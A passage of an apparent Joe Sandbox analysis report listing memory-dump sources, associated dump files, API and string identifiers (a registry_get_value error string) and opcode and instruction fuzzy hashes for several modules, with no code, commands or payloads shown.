                                                                    • Associated: 00000014.00000002.2560013124.00007FFE11520000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560027784.00007FFE11521000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560045093.00007FFE11524000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ffe11500000_main.jbxd
                                                                    Similarity
                                                                    • API ID: Closefflushfwrite
                                                                    • String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
                                                                    • API String ID: 1001908780-1680961811
                                                                    • Opcode ID: fd93fff9273f651b3e8a54ee41b304a043c5c2319348bbb01805982121bc120f
                                                                    • Instruction ID: bcb7d440656e18428de8e5a1bd1c58599e49d6bce39835c3f74d04403cbb5e67
                                                                    • Opcode Fuzzy Hash: fd93fff9273f651b3e8a54ee41b304a043c5c2319348bbb01805982121bc120f
                                                                    • Instruction Fuzzy Hash: 14F09662A08F4A42E7528F46B8413BD725DAF447B4F480279DD5D466B0EF2DD9859700
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2560074476.00007FFE13301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE13300000, based on PE: true
                                                                    • Associated: 00000014.00000002.2560059627.00007FFE13300000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560096145.00007FFE13310000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560114963.00007FFE13318000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560131841.00007FFE1331B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560148324.00007FFE1331C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ffe13300000_main.jbxd
                                                                    Similarity
                                                                    • API ID: Closefflushfwrite
                                                                    • String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
                                                                    • API String ID: 1001908780-1680961811
                                                                    • Opcode ID: b7cceda3cb23441d6699ae82fe881b405986d1a579641fcc7af4eb1fbd312bd1
                                                                    • Instruction ID: 8c248c190733f8247c88dc96b66a2bd61223d93ef7a7ac77de4feb1eff5ab347
                                                                    • Opcode Fuzzy Hash: b7cceda3cb23441d6699ae82fe881b405986d1a579641fcc7af4eb1fbd312bd1
                                                                    • Instruction Fuzzy Hash: 3FF0F622608F0A89E5528F42F8403B96558BF647B4F080276DD7D6A6A1DF3DD9899308
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2560074476.00007FFE13301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE13300000, based on PE: true
                                                                    • Associated: 00000014.00000002.2560059627.00007FFE13300000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560096145.00007FFE13310000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560114963.00007FFE13318000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560131841.00007FFE1331B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560148324.00007FFE1331C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ffe13300000_main.jbxd
                                                                    Similarity
                                                                    • API ID: Closefflushfwrite
                                                                    • String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
                                                                    • API String ID: 1001908780-1680961811
                                                                    • Opcode ID: 979aaefb9ee854455b9fc8ba83aaa0ee24a678513e2b235b93815afc7ef0ec21
                                                                    • Instruction ID: e822cacc26250c14dd84ca27b140903586edeb1c573d1e2e063765323073508e
                                                                    • Opcode Fuzzy Hash: 979aaefb9ee854455b9fc8ba83aaa0ee24a678513e2b235b93815afc7ef0ec21
                                                                    • Instruction Fuzzy Hash: 47F0F622608F0A89E5528F42FC403B96558AF647B5F040276DD3D6A6A2DF3DD9899308
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2560074476.00007FFE13301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE13300000, based on PE: true
                                                                    • Associated: 00000014.00000002.2560059627.00007FFE13300000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560096145.00007FFE13310000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560114963.00007FFE13318000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560131841.00007FFE1331B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560148324.00007FFE1331C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ffe13300000_main.jbxd
                                                                    Similarity
                                                                    • API ID: Closefflushfwrite
                                                                    • String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
                                                                    • API String ID: 1001908780-1680961811
                                                                    • Opcode ID: 0cc9a2db373132872f07aa2167d42aeb2a991e803d66af3d86870bf241ac1999
                                                                    • Instruction ID: 63a81312f53407209d79af83dfef1c8f23b823e85fdc665b74308ef6b33bba57
                                                                    • Opcode Fuzzy Hash: 0cc9a2db373132872f07aa2167d42aeb2a991e803d66af3d86870bf241ac1999
                                                                    • Instruction Fuzzy Hash: 77F02B22608E0A89E5528F42FC403BD7558BF647B4F040276DD3C6A6F1DF3DD9899308
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2560074476.00007FFE13301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE13300000, based on PE: true
                                                                    • Associated: 00000014.00000002.2560059627.00007FFE13300000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560096145.00007FFE13310000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560114963.00007FFE13318000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560131841.00007FFE1331B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560148324.00007FFE1331C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ffe13300000_main.jbxd
                                                                    Similarity
                                                                    • API ID: Closefflushfwrite
                                                                    • String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
                                                                    • API String ID: 1001908780-1680961811
                                                                    • Opcode ID: 4128747c4ca0b8cc9a245100979757ec6d00d611ea27991d761a859eed8a87f0
                                                                    • Instruction ID: c2e25332384e34da53249b29710322886a7c57623db2ca3f520b695683901a96
                                                                    • Opcode Fuzzy Hash: 4128747c4ca0b8cc9a245100979757ec6d00d611ea27991d761a859eed8a87f0
                                                                    • Instruction Fuzzy Hash: 74F0F622608E0A89E5528F42FC403B96558AF647B4F040276DD3D6A6A1DF3DD9899308
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2560074476.00007FFE13301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE13300000, based on PE: true
                                                                    • Associated: 00000014.00000002.2560059627.00007FFE13300000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560096145.00007FFE13310000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560114963.00007FFE13318000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560131841.00007FFE1331B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560148324.00007FFE1331C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ffe13300000_main.jbxd
                                                                    Similarity
                                                                    • API ID: Closefflushfwrite
                                                                    • String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
                                                                    • API String ID: 1001908780-1680961811
                                                                    • Opcode ID: 4ea518d26ddb2f10070f89be5104cfe22f6a1b4ea3490499cd4cd085461000ac
                                                                    • Instruction ID: 1ce8ac4280d5061e72d7e9bf9cd22e1119cca2ec6a29c8f24a9fca3d78196187
                                                                    • Opcode Fuzzy Hash: 4ea518d26ddb2f10070f89be5104cfe22f6a1b4ea3490499cd4cd085461000ac
                                                                    • Instruction Fuzzy Hash: DEF0F622608E0A8AE5528F42FC403B96558AF647B4F040276DD3D6A6A1DF3DD9899308
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2559615479.00007FFE0EB41000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFE0EB40000, based on PE: true
                                                                    • Associated: 00000014.00000002.2559600601.00007FFE0EB40000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559637544.00007FFE0EB56000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559653233.00007FFE0EB60000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559668361.00007FFE0EB63000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559683911.00007FFE0EB64000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ffe0eb40000_main.jbxd
                                                                    Similarity
                                                                    • API ID: Closefflushfwrite
                                                                    • String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
                                                                    • API String ID: 1001908780-1680961811
                                                                    • Opcode ID: 3895ea5ccc1a9c0ba70ec562e9d7737373ffcc11e245141d9ecc3ceb47b072fc
                                                                    • Instruction ID: 4d6367f23d750e54cbf7b5c6bdcdb0ffc3a1cb4afdfdd422114128118ddbd8ab
                                                                    • Opcode Fuzzy Hash: 3895ea5ccc1a9c0ba70ec562e9d7737373ffcc11e245141d9ecc3ceb47b072fc
                                                                    • Instruction Fuzzy Hash: 18F09662B0874642E5628F04BC403797354FF44794F480136ED8D466B4DF3DDA85AB01
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2559615479.00007FFE0EB41000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFE0EB40000, based on PE: true
                                                                    • Associated: 00000014.00000002.2559600601.00007FFE0EB40000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559637544.00007FFE0EB56000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559653233.00007FFE0EB60000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559668361.00007FFE0EB63000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559683911.00007FFE0EB64000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ffe0eb40000_main.jbxd
                                                                    Similarity
                                                                    • API ID: Closefflushfwrite
                                                                    • String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
                                                                    • API String ID: 1001908780-1680961811
                                                                    • Opcode ID: 0ae7c48307a6deb01bbf84268c238f770e68e431e8e92444f6d98cededd14a4a
                                                                    • Instruction ID: 044903b2d2cece02747f7833f4b3a9fc6c983225c2cdb15cae34df008f4bcfe5
                                                                    • Opcode Fuzzy Hash: 0ae7c48307a6deb01bbf84268c238f770e68e431e8e92444f6d98cededd14a4a
                                                                    • Instruction Fuzzy Hash: 1EF09662B0874642E5628F44B8403797354FF44794F480136ED8D866B4DF3DDA85AB01
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2559615479.00007FFE0EB41000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFE0EB40000, based on PE: true
                                                                    • Associated: 00000014.00000002.2559600601.00007FFE0EB40000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559637544.00007FFE0EB56000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559653233.00007FFE0EB60000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559668361.00007FFE0EB63000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559683911.00007FFE0EB64000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ffe0eb40000_main.jbxd
                                                                    Similarity
                                                                    • API ID: Closefflushfwrite
                                                                    • String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
                                                                    • API String ID: 1001908780-1680961811
                                                                    • Opcode ID: a946e6fb01939640250fe4d87fd1727f894f0189a636eb6478591194451f6b32
                                                                    • Instruction ID: d59f4d71303ca7646aa86d195382bfca98fa3ad25ee7ada5f5e0739565312152
                                                                    • Opcode Fuzzy Hash: a946e6fb01939640250fe4d87fd1727f894f0189a636eb6478591194451f6b32
                                                                    • Instruction Fuzzy Hash: 75F09662B0874A42E5628F04B8403797354FF44795F480235ED8D466B4EF3DDA85AB01
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2559615479.00007FFE0EB41000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFE0EB40000, based on PE: true
                                                                    • Associated: 00000014.00000002.2559600601.00007FFE0EB40000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559637544.00007FFE0EB56000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559653233.00007FFE0EB60000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559668361.00007FFE0EB63000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559683911.00007FFE0EB64000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ffe0eb40000_main.jbxd
                                                                    Similarity
                                                                    • API ID: Closefflushfwrite
                                                                    • String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
                                                                    • API String ID: 1001908780-1680961811
                                                                    • Opcode ID: cb64d1539feb0c34fc73d2a78e2a49e7fe7a9be699fe1023e1cdf2c904b94b15
                                                                    • Instruction ID: ae9e141f36b9c0831bb92af63c44a5fb23f5088fc813885a4ceccdc45f64d937
                                                                    • Opcode Fuzzy Hash: cb64d1539feb0c34fc73d2a78e2a49e7fe7a9be699fe1023e1cdf2c904b94b15
                                                                    • Instruction Fuzzy Hash: 58F09662B0874642E5728F04BC403797354FF44794F480135ED8D466B4DF3DDA89AB00
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2559615479.00007FFE0EB41000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFE0EB40000, based on PE: true
                                                                    • Associated: 00000014.00000002.2559600601.00007FFE0EB40000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559637544.00007FFE0EB56000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559653233.00007FFE0EB60000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559668361.00007FFE0EB63000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559683911.00007FFE0EB64000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ffe0eb40000_main.jbxd
                                                                    Similarity
                                                                    • API ID: Closefflushfwrite
                                                                    • String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
                                                                    • API String ID: 1001908780-1680961811
                                                                    • Opcode ID: cda576ce803dd63f734d1a0fb6bc0958773d9d3f96f8f8fa6c15edd8b57912cf
                                                                    • Instruction ID: 06a69a677d2a1ee8c3e1a6ba24ff54d960bcd23942e6877465c3697182eeed66
                                                                    • Opcode Fuzzy Hash: cda576ce803dd63f734d1a0fb6bc0958773d9d3f96f8f8fa6c15edd8b57912cf
                                                                    • Instruction Fuzzy Hash: 20F09662B0874642E6628F04B8403797354FF44794F484235EDCD466B4DF3DDA89AB01
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2559714739.00007FFE0EBD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFE0EBD0000, based on PE: true
                                                                    • Associated: 00000014.00000002.2559699117.00007FFE0EBD0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559733043.00007FFE0EBE3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559748990.00007FFE0EBEC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559764197.00007FFE0EBEF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559777530.00007FFE0EBF0000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ffe0ebd0000_main.jbxd
                                                                    Similarity
                                                                    • API ID: Closefflushfwrite
                                                                    • String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
                                                                    • API String ID: 1001908780-1680961811
                                                                    • Opcode ID: 676d3f13e198f3de7173fa8373e3709d42d953948c6bae17c404deb5109574b0
                                                                    • Instruction ID: c0f734465569bb2e6c52a05fd1838937d43b8a975adaeb6fe3882c28aa58f4b4
                                                                    • Opcode Fuzzy Hash: 676d3f13e198f3de7173fa8373e3709d42d953948c6bae17c404deb5109574b0
                                                                    • Instruction Fuzzy Hash: FDF0966260D70A42E5768F04B8403B56354AF547A5F480236DDCD467B4FF3EE9859B00
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2559714739.00007FFE0EBD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFE0EBD0000, based on PE: true
                                                                    • Associated: 00000014.00000002.2559699117.00007FFE0EBD0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559733043.00007FFE0EBE3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559748990.00007FFE0EBEC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559764197.00007FFE0EBEF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559777530.00007FFE0EBF0000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ffe0ebd0000_main.jbxd
                                                                    Similarity
                                                                    • API ID: Closefflushfwrite
                                                                    • String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
                                                                    • API String ID: 1001908780-1680961811
                                                                    • Opcode ID: 2e6ac4fc452734bb0c7e0050797ebd2c08b91caccf92f2d43370638ef6e2929f
                                                                    • Instruction ID: 751f8bd81f4e8f7e5e5644a2b5301ea0a5bfe0e5cb7c8b9d81cd545fbf598592
                                                                    • Opcode Fuzzy Hash: 2e6ac4fc452734bb0c7e0050797ebd2c08b91caccf92f2d43370638ef6e2929f
                                                                    • Instruction Fuzzy Hash: 9BF0966260D60642E5768F04BC403B56354BF547A5F480136DDCD467F4FF3EE9899B00
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2559714739.00007FFE0EBD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFE0EBD0000, based on PE: true
                                                                    • Associated: 00000014.00000002.2559699117.00007FFE0EBD0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559733043.00007FFE0EBE3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559748990.00007FFE0EBEC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559764197.00007FFE0EBEF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559777530.00007FFE0EBF0000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ffe0ebd0000_main.jbxd
                                                                    Similarity
                                                                    • API ID: Closefflushfwrite
                                                                    • String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
                                                                    • API String ID: 1001908780-1680961811
                                                                    • Opcode ID: 181c32daf97e77dc0a1e131eaa5bae658fcc62ff7599e1bdd728a10a01cc927c
                                                                    • Instruction ID: 9e0e65d8bf67a38ed7f7d47937f12ba9f8aeef4b42dacd0dfd1586f432a9766a
                                                                    • Opcode Fuzzy Hash: 181c32daf97e77dc0a1e131eaa5bae658fcc62ff7599e1bdd728a10a01cc927c
                                                                    • Instruction Fuzzy Hash: 0DF0966260D70642E6768F04B8403B56354BF547A5F480236DDCD467B4FF3EE9899B00
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2559714739.00007FFE0EBD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFE0EBD0000, based on PE: true
                                                                    • Associated: 00000014.00000002.2559699117.00007FFE0EBD0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559733043.00007FFE0EBE3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559748990.00007FFE0EBEC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559764197.00007FFE0EBEF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559777530.00007FFE0EBF0000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ffe0ebd0000_main.jbxd
                                                                    Similarity
                                                                    • API ID: Closefflushfwrite
                                                                    • String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
                                                                    • API String ID: 1001908780-1680961811
                                                                    • Opcode ID: 2745d26881636b195d42a3cab413b45b001f3d20afc6ac5fa0dcbe039b19ca07
                                                                    • Instruction ID: 40cf6b186f0d7dad6250dc640f31aca71e7ab3e550f7f1c81ed2d6276201c237
                                                                    • Opcode Fuzzy Hash: 2745d26881636b195d42a3cab413b45b001f3d20afc6ac5fa0dcbe039b19ca07
                                                                    • Instruction Fuzzy Hash: FCF0966260D60642E5768F04B8403B56354AF547A5F480136DDCD467B4FF3EE9859B00
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2559714739.00007FFE0EBD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFE0EBD0000, based on PE: true
                                                                    • Associated: 00000014.00000002.2559699117.00007FFE0EBD0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559733043.00007FFE0EBE3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559748990.00007FFE0EBEC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559764197.00007FFE0EBEF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559777530.00007FFE0EBF0000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ffe0ebd0000_main.jbxd
                                                                    Similarity
                                                                    • API ID: Closefflushfwrite
                                                                    • String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
                                                                    • API String ID: 1001908780-1680961811
                                                                    • Opcode ID: 73bf8a35bb48351cd0d25f1bb76652707aface3227f603294c8b4d980d48cf6f
                                                                    • Instruction ID: 3e37d70ca1d49b4bdb7872e231e9f2b744e931e5fcd53ca7f008a8d14ed0d1c8
                                                                    • Opcode Fuzzy Hash: 73bf8a35bb48351cd0d25f1bb76652707aface3227f603294c8b4d980d48cf6f
                                                                    • Instruction Fuzzy Hash: 37F0966260D60642E5768F04BC403B56354AF547A5F480136DDCD467B4FF3EEA859B00
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2559811045.00007FFE0EC01000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFE0EC00000, based on PE: true
                                                                    • Associated: 00000014.00000002.2559796463.00007FFE0EC00000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559830630.00007FFE0EC12000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559846613.00007FFE0EC1B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559867290.00007FFE0EC1E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559886112.00007FFE0EC1F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559905319.00007FFE0EC22000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ffe0ec00000_main.jbxd
                                                                    Similarity
                                                                    • API ID: Closefflushfwrite
                                                                    • String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
                                                                    • API String ID: 1001908780-1680961811
                                                                    • Opcode ID: 1f8b6be4531e4f61a9b791164e86e5d65f11346d678c3961dc24315970669e59
                                                                    • Instruction ID: 85c73d4dd8fb205b9f740cc15953a342ff1463d59d1dbeeeb47ea44b08f4990e
                                                                    • Opcode Fuzzy Hash: 1f8b6be4531e4f61a9b791164e86e5d65f11346d678c3961dc24315970669e59
                                                                    • Instruction Fuzzy Hash: CDF0BB6270878A62E5628F44F8C03B96254FFC67A4F480235EDCD466F2EF3ED9859302
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2559811045.00007FFE0EC01000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFE0EC00000, based on PE: true
                                                                    • Associated: 00000014.00000002.2559796463.00007FFE0EC00000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559830630.00007FFE0EC12000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559846613.00007FFE0EC1B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559867290.00007FFE0EC1E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559886112.00007FFE0EC1F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559905319.00007FFE0EC22000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ffe0ec00000_main.jbxd
                                                                    Similarity
                                                                    • API ID: Closefflushfwrite
                                                                    • String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
                                                                    • API String ID: 1001908780-1680961811
                                                                    • Opcode ID: 5e972d20f0db2410af95bb835652d4743476dec15b4255502ad73526abce4442
                                                                    • Instruction ID: 4faf6d9bd7dcec9f53a93613842189fd9f9e885b68372aa37d8a083ea913296a
                                                                    • Opcode Fuzzy Hash: 5e972d20f0db2410af95bb835652d4743476dec15b4255502ad73526abce4442
                                                                    • Instruction Fuzzy Hash: E9F0BB6260868662E5628F44FCC03B96254FFC67A4F480235EDCD466F1EF3ED9899301
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2559811045.00007FFE0EC01000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFE0EC00000, based on PE: true
                                                                    • Associated: 00000014.00000002.2559796463.00007FFE0EC00000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559830630.00007FFE0EC12000.00000002.00000001.01000000.00000008.sdmpDownload File
